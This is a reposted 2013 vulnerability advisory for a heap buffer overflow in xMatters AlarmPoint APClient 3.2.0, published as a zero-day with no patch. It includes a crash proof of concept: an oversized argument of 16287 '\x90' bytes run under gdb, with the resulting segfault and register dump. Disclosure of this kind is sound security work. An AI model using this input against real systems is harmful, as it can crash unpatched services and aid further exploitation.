首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
xMatters Alarmpoint BoF-0day
来源:vfocus.net 作者:Juan Sacco 发布时间:2013-02-18  
Information
 --------------------

 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High

 Description
 ------------------
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 -------------------
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follow:
 Submit a malicious file cointaining the exploit
 root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$  
 ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print "\x90"*16287'`
 Starting program: 
 /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 
 'print "\x90"*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax            0xa303924        170932516
 ecx            0xbfb8   49080
 edx            0xa303924        170932516
 ebx            0x8059438        134583352
 esp            0xbfff3620       0xbfff3620
 ebp            0xbfff3638       0xbfff3638
 esi            0x8059440        134583360
 edi            0x80653f0        134632432
 eip            0x804be8a        0x804be8a <free+126>
 eflags         0x210206 [ PF IF RF ID ]
 cs             0x73     115
 ss             0x7b     123
 ds             0x7b     123
 es             0x7b     123
 fs             0x0      0
 gs             0x33     51
 (gdb)


 Solution
 -------------------
 No patch are available at this time.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EChat Server 3.1 BoF-0day
·Apple iPhone iOS Default SSH P
·Microsoft Internet Explorer SL
·VLC 2.0.5 (.bmp) Heap Overflow
·Foxit Reader Plugin URL Proces
·Photodex ProShow Producer 5.0.
·iRobosoft Internet Browser Mem
·Photodex ProShow Producer v5.0
·Polycom HDX Telnet Authorizati
·Windows Manage User Level Pers
·Novell GroupWise Client gwcls1
·BigAnt Server DUPF Command Arb
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved